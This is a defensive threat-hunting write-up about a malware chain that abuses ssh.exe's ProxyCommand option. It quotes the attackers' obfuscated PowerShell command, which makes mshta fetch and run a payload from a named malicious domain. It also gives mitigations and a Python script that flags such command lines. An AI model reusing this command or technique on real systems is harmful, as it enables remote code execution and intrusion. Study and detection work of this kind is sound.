Hunter-Case-01 - SSH Proxy Command Lolbas
1.) Information
Hunter Blue's day started with an interesting case: a process chain we first saw on one infected device and later on many others, whose delivery and execution stages the XDR system had neither prevented, detected nor alerted on.
This is why you should always examine the initial entry point of a malware infection instead of trusting the detections of your EDR or XDR system alone.
Investigate the initial access and execution, then search the logs for the resulting IoCs / IoAs to find the artifacts that matter for threat hunting.
1.1) Information Links and Research
LOLBAS entry for ssh.exe and its ProxyCommand option: https://lolbas-project.github.io/lolbas/Binaries/Ssh/
OpenSSH manual page describing the ProxyCommand option: https://man.openbsd.org/ssh
Dynamic malware analysis (any.run) of a sample of this kind, uploaded earlier by another affected organisation: https://any.run/report/39fcf6143a801de8acba009ef69ac4f7b533d8e1b91337547ca578f2b7117534/11a68474-4e9a-4070-9b23-b8d244c9fc02
-> Further research: https://any.run/cybersecurity-blog/client-side-exploitation/
-> The most thorough write-up of the same campaign we saw: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/
2.) Attack Chain
Other infection chains seen in our cases
3.) Initial Access
UPDATE 06122024: In the case we handled in the SOC, the user was browsing the web for a manual, found a link to a PDF, clicked it and so started the infection chain.
In this infection chain the user first downloaded an LNK file from a WebDAV share (the rundll32.exe davclnt.dll,DavSetCookie method).
The LNK file runs ssh.exe (C:\Windows\System32\OpenSSH\ssh.exe) with the following argument, abusing the ProxyCommand option to execute an arbitrary command instead of a proxy:
"-o ProxyCommand= "powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]' -replace']')".
Obfuscated PowerShell
The -replace ']' strips the padding characters, so the PowerShell command resolves to and spawns mshta.exe, which downloads and executes additional code on the host:
mshta.exe hxxps[:]//berb.fitnessclub-filmfanatics.com/z[.]mp4
Malicious .mp4 file downloaded (the extension is a disguise: mshta.exe runs whatever it fetches as HTML Application content)
4.) Finding through Threat Hunting
The obfuscated PowerShell command was blocked by the XDR system, but if you stop at that single event you will miss the valuable information behind this attack.
We hunted through the data lake logs of the whole infrastructure and, as you might guess, found another host running the same chain to fetch the malicious file from the WebDAV server; nothing on that host was detected or blocked until the obfuscated PowerShell execution.
5.) Mitigation
The initial breach may arrive via spam email.
Limit email attachments to known, legitimate file types on the email gateway (allowlisting, not blocklisting).
UPDATE 06122024: As noted under Initial Access, in our case the entry point was not an email but a PDF link the user found while searching the web for manuals.
Awareness training is therefore essential: teach your users in a simple way how such malicious operations are carried out (run engaging awareness campaigns so that users actually learn something, and do not blame them for not knowing these techniques ;) )
Attack Surface Reduction (ASR) rules to break the execution chain of malicious files
Application Control (WDAC, or its successor App Control for Business) to block malicious executions
Monitor outbound WebDAV requests: WebDAV runs over HTTP(S), so blocking outbound SMB alone does not stop this delivery path
Consider disabling the execution of shortcut files (.lnk) originating from remote locations such as WebDAV shares, or implement policies that require explicit user consent before such files run.
Exercise Caution: Only download and open files from trusted and verified sources.
Check File Extensions: Make sure a file has the extension you expect before opening it (e.g. .pdf for a PDF, not .lnk).
Report Suspicious Activity: If you encounter unexpected files or activities, report them immediately for further investigation.
6.) Detection and Hunting
Hunt for suspicious "ProxyCommand=" values in ssh.exe command lines.
Hunt for rundll32.exe invocations of davclnt.dll,DavSetCookie (the WebDAV download method); this should definitely be running in your environment -> see the command line shown under Initial Access.
My colleague from the Incident Response team also explains in his blog post how threat actors misuse such commands: https://dfir.ch/posts/search-ms_protocol_handler/
Specific indicators include use of the search-ms URI protocol handler in HTML files, unexpected pop-ups asking to open Windows Explorer, and subsequent WebDAV connections to remote servers.
Monitoring for the creation or execution of LNK files that point to batch scripts is another focus.
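The attack chain described under Initial Access and the two hunting points above (ssh.exe ProxyCommand values and rundll32 davclnt.dll,DavSetCookie) can be turned into a small triage script. The following Python is an added example written for this page, not code from the original post or from any tool it references. The process-creation events it runs over are constructed in the shape of Sysmon Event ID 1 / Defender DeviceProcessEvents rows; the padded mshta string mimics the sample's ('...' -replace ']') trick with a placeholder host (malicious.example, not the real domain); the LOLBin list and the severity labels are my own choices.

```python
import re

# Constructed sample process-creation events (not real telemetry). The shape
# (image + command line) mirrors Sysmon Event ID 1 / Defender DeviceProcessEvents.
# The padded string mimics the sample's ('msh]]t]]a...' -replace ']') trick with a
# placeholder host; the real case used a different domain.
PADDED = "msh]]]t]]a.e]]x]e ]]h]tt]]ps:]//mal]]icious.ex]]ample/z.]]mp4"

SAMPLE_EVENTS = [
    # 1: WebDAV fetch of the LNK via rundll32 (the DavSetCookie method), over HTTP
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie "
                r"webdav.example@80 http://webdav.example/share/Manual.pdf.lnk"},
    # 2: the LNK payload: ssh.exe abused as a launcher through ProxyCommand
    {"id": 2, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -o ProxyCommand=\"powershell powershell -Command ('"
                + PADDED + "' -replace ']')\""},
    # 3: legitimate ProxyCommand use (jump host) that must not page anyone
    {"id": 3, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": 'ssh.exe -o ProxyCommand="ssh -W %h:%p jump.example" admin@db01'},
    # 4: ordinary PowerShell, no findings expected
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},
]

PROXYCMD_RE = re.compile(r'ProxyCommand\s*=\s*"?(.*)', re.IGNORECASE)
# ('payload' -replace 'pad'): PowerShell's two-operand -replace deletes every match
REPLACE_RE = re.compile(r"\(\s*'([^']*)'\s*-replace\s*'([^']*)'\s*\)", re.IGNORECASE)
DAV_RE = re.compile(r"davclnt\.dll\s*,\s*DavSetCookie", re.IGNORECASE)
# interpreters / LOLBins that have no business acting as an SSH proxy (own list)
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|rundll32|wscript|cscript|certutil|regsvr32)(\.exe)?\b",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
SEVERITY_RANK = {"high": 3, "medium": 2, "low": 1}


def deobfuscate_replace(cmdline):
    """Undo the ('padded' -replace 'pad') trick and return the hidden command, or None.

    -replace is regex-based; treating the pad as a literal is enough for the
    single-character padding seen here and avoids evaluating attacker-supplied regex.
    """
    m = REPLACE_RE.search(cmdline)
    if not m:
        return None
    padded, pad = m.group(1), m.group(2)
    return padded.replace(pad, "")


def classify(event):
    """Return a list of (severity, reason) findings for one process-creation event."""
    findings = []
    image = event["image"].lower()
    cmd = event["cmdline"]

    if image.endswith("rundll32.exe") and DAV_RE.search(cmd):
        findings.append(("medium", "rundll32 davclnt.dll,DavSetCookie: WebDAV fetch over "
                                   "HTTP, unaffected by outbound SMB blocks"))

    if image.endswith("ssh.exe"):
        m = PROXYCMD_RE.search(cmd)
        if m:
            lolbin = LOLBIN_RE.search(m.group(1))
            if lolbin:
                findings.append(("high", "ssh.exe ProxyCommand launches "
                                         + lolbin.group(1).lower()))
            else:
                findings.append(("low", "ssh.exe ProxyCommand set; jump-host use is "
                                        "common, review the target"))

    hidden = deobfuscate_replace(cmd)
    if hidden:
        urls = URL_RE.findall(hidden)
        findings.append(("high", "PowerShell -replace padding hides: " + hidden
                         + (" (URL: " + ", ".join(urls) + ")" if urls else "")))
    return findings


def hunt(events):
    """Classify a batch; return (id, worst severity, findings) for hits, worst first."""
    hits = []
    for ev in events:
        findings = classify(ev)
        if findings:
            worst = max(findings, key=lambda f: SEVERITY_RANK[f[0]])[0]
            hits.append((ev["id"], worst, findings))
    hits.sort(key=lambda h: SEVERITY_RANK[h[1]], reverse=True)
    return hits


if __name__ == "__main__":
    for ev_id, worst, findings in hunt(SAMPLE_EVENTS):
        print(f"event {ev_id} [{worst}]")
        for sev, reason in findings:
            print(f"  {sev}: {reason}")
```

Run as-is it prints events 2, 1 and 3 as hits and stays silent on the benign PowerShell event; in practice the event list would be the export of your process-creation telemetry. The regexes are deliberately narrow: a different pad character, a pattern stored in a variable or a Base64-encoded command would slip past the -replace decoder, which is why the more durable signal is the process tree itself, i.e. ssh.exe ending up with a script interpreter or LOLBin underneath it.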
6.1) Sigma Rules
6.2) Yara Rules
6.3) Hunting Queries Tanium
6.4) Hunting Queries Defender XDR
7.) Conclusion and Learning for a Hunter Blue
The EDR on this host did not pick up the malicious WebDAV commands, which shows how fruitful threat hunting can be.